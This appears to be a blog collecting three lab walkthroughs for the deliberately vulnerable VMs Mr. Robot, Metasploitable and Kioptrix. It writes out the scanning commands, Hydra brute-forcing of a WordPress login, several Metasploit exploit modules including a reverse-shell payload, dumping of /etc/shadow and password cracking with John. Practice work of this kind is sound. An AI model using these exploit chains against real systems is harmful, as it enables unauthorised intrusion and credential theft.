Mr. Robot – Walkthrough

A number of friends and I decided to take on Mr. Robot from VulnHub, See the link Mr. Robot. Shout out to Jason for putting this VM together. I liked the landing page, especially the link to COMMODORE 64 Emulator! Now let’s get right to it.

I threw nmap at it and looks like we only have port 80 & 443 open.

nmap -p- -sT -A mrRobot

Now, I’m going to fire up Nikto and see what we get

Nikto -h mrRobot

Looks like we got ourselves a WordPress site, This is what I got browsing to license

On the other hand, robots.txt contains some juicy information for us.

key-1-of-3.txt contains our first key, I did try to crack the key which you can tell it’s an MD5 hash thru multiple online crackers with no luck.

Browsing to fsocity.dic will prompt you to download a wordlist file. Now that we got the password list, all we need is a valid username to brute force our way in. So, I made list of names of all the characters from the show Mr. Robot to try in wp-login.php starting with Elliot. and then I got the following, which tells me Elliot is valid username my friends

I used Hydra with the option “:S=Location” which is what you’re suppose to get in http-response if you were to login successfully.

Bingo! we found password for Elliot, who turned out to be the administrator of the WP site.

Now it’s time to check Metasploit and see if there are any interesting wp-plugin exploits, the following exploit caught my eye as it grants you remote shell to the backend server, which is exactly what I need.

With the help of  google, I was able to download and activate this plugin

Let’s go back to Metasploit and try it out

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST mrRobot
set WP_USER Elliot
Set WP_PASSWORD ER28-0652
exploit

We’ve successfully got remote shell to the backend server, Now after some poking around I found the following in user robot home directory

Unfortunately, I was unable to cat key-2-of-3.txt however I was able to cat password.raw-md5 which later found to be the following password thru online MD5 cracker “abcdefghijklmnopqrstuvwxyz”. Let’s hop to the VM console and give it a try. And sure enough, I was able to login and get the second key.

This leave us with the third and final key, usually in those type of situations you need to find a way to elevate to root and start looking for the final gem. With the help of RTFM (Red Team Field Manual) book I was able to find the following.

And then I used nmap to gain root shell and cat the content of the third and final key key-3-of-3.txt

Happy hunting!

Pwning Metasploitable – Walkthrough

Metasploitable VM is vulnerable by design Linux box provided by Rapid7 to practice Metasploit framework. You can download it from vulnhub. I used Kali box and VMWare Player for this exercise also made sure that both VMs are set to host-only.

Now the purpose of Metasploitable is to find a way to root the box, and there are number of ways to do that, but it depends on your approach. It took me 3 exploits to r00t the box and am gona go thru all of them in the following section.

Fire up nmap to see what we have here.

nmap -p- -sT -A -sV -O -T4 -oN /root/Desktop/nmap_metasploitable.txt 192.168.68.144
nmap -p- -sT -A -sV -O -T4 -oN /root/Desktop/nmap_metasploitable.txt 192.168.68.144

Well, you can see there is a lot you can go after over here but am gona go with the easiest just because I’m lazy.

I’ll go after distccd v1 even though I don’t really know what it does. so I fired metasploit and searched for distccd and I was able to get shell with daemon privilege.

use exploit/unix/misc/distcc_exec set RHOST 192.168.68.144 exploit
use exploit/unix/misc/distcc_exec
set RHOST 192.168.68.144
exploit

However, we’re shooitng for r00t.

Next, I looked for postgres exploits and found one with excellent rating but you’d have to have username n password so I fired up Metasploit postgres login scanner and got hit on postgres:postgres, and then used it to exploit.

use auxiliary/scanner/postgres/postgres_login set RHOST 192.168.68.144 exploit use exploit/Linux/postgres/postgres_payload set RHOST 192.168.68.144 set PASSWORD postgres exploit
use auxiliary/scanner/postgres/postgres_login
set RHOST 192.168.68.144
exploit
use exploit/Linux/postgres/postgres_payload
set RHOST 192.168.68.144
set PASSWORD postgres
exploit

Again no rØØt shell. On to the next one.

Looked for all Samba exploits with excellent and Linux filter which lead me to usermap_script and BOOM! I got r00t shell.

use exploit/multi/samba/usermap_script set RHOST 192.168.68.144 exploit cat /etc/shadow cat /ect/passwd
use exploit/multi/samba/usermap_script
set RHOST 192.168.68.144
exploit
cat /etc/shadow
cat /ect/passwd

Finally decided to copy shadow and passwd hashes and give it a try, below are the list of usernames and passwords that John the Ripper cracked.

unshadow /root/Desktop/passwd.txt /root/Desktop/shadow.txt > meta_pw_dump.txt john /root/Desktop/meta_pw_dump.txt
unshadow /root/Desktop/passwd.txt /root/Desktop/shadow.txt > meta_pw_dump.txt
john /root/Desktop/meta_pw_dump.txt

Happy hunting!

Kioptrix Level 1 – Write Up

In this blog, we’re going walkthrough how to get root shell on Kioptrix Level 1 VM. First things first, after downloading/importing VM, make sure that its network settings set to host-only as well as; your Kali box. without further ado, let’s get right to it.

Fire up nmap and kick-off an intensive scan

nmap -sT -A -T4 -p- -v 192.168.68.141 -oN /root/Desktop/nmap_results.txt
nmap -sT -A -T4 -p- -v 192.168.68.141 -oN /root/Desktop/nmap_results.txt

Looks like its running apache test webpage on port 80 & 443, ssh on port 22, NetBIOS-ssn on port 139, and rpcbind on port 111

Fire up dirb and see if we can get anything interesting

dirb http://192.168.68.141/ /usr/share/wordlists/dirb/common.txt
dirb http://192.168.68.141/ /usr/share/wordlists/dirb/common.txt

Well, turns out there is nothing useful on the webpage.

Tried to look for any mountable shares with no luck, but then I threw enum4linux at it and got bunch of interesting information. The one that stuck out for me was VM is using Samba 2.2.1a which I know for a fact there is metasploit module for it (CVE-2003-201).

info exploit/linux/samba/trans2open
info exploit/linux/samba/trans2open

Fire up metasploit and use samba exploit

use /exploit/linux/samba/trans2open set RHOST kioptrix set LHOST kali set LPORT 4545 set PAYLOAD generic/shell_reverse_tcp exploit uname -a id
use /exploit/linux/samba/trans2open
set RHOST kioptrix
set LHOST kali
set LPORT 4545
set PAYLOAD generic/shell_reverse_tcp
exploit
uname -a
id

Bingo!

Happy hunting!